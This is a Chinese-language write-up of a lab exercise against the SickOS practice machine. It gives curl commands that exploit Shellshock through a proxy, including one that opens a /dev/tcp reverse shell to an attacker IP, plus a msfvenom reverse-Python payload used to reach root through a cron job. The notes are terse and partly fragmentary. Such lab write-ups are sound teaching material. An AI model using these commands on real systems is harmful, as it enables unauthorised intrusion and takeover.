网站导航
> 文章列表 > 靶机精讲之SickOS-方法2

靶机精讲之SickOS-方法2

网友: 文章列表 2024-03-21 17:56:49

靶机精讲之SickOS-方法2

主机发现

 用代理扫描

nikto扫描

sudo nikto -h 192.168.10.191 -useproxy http://192.168.10.191/3128

 

 shellshock漏洞原理

 验证有没有shellshock漏洞

用curl挂代理

sudo curl -v --proxy http://192.168.10.191:3128 http://192.168.10.191/cgi-bin/status -H "Referer:(){ test:}; echo 'Content-Type: text/plain'; echo; echo; /usr/bin/id;exit"

shellshock漏洞验证

 

 存在

获取初始系统shell

msfvenom 生成后门

生成payload

 建立监听

 执行命令(修改路径

 把上面指令复制

无反应,路径应该要完整

重新开始监听

 加上完整路径sh前加上/bin/

 每个空格字母都要主要

sudo curl -v --proxy http://192.168.10.191:3128 http://192.168.10.191/cgi-bin/status -H "Referer:() { test;}; 0<&108-;exec 108<>/dev/tcp/192.168.10.153/443;/bin/sh <&108 >&108 2>&108"

反弹成功,半个shell

 

 dpkg -l 查看装的软件

运行python,获得更好的shell

 看权限

 返回翻文件

 

 

 翻网站

 看目录

 

 执行python

 执行ls liah cr*(检索关键字)

Cron自动任务提权

cat crontab

root,定时命令

可以把命令植入该路径

 生成payload

sudo msfvenom -p cmd/unix/reverse_python lhost=192.168.10.153 lport=444 -f raw

rooted

 把python -c后的生成码粘贴不带“

 

 输入o,然后粘贴payload

 (靶机环境崩坏,结束做笔记)

 

 回弹拿shell成功

 

 

网络标签:

相关问题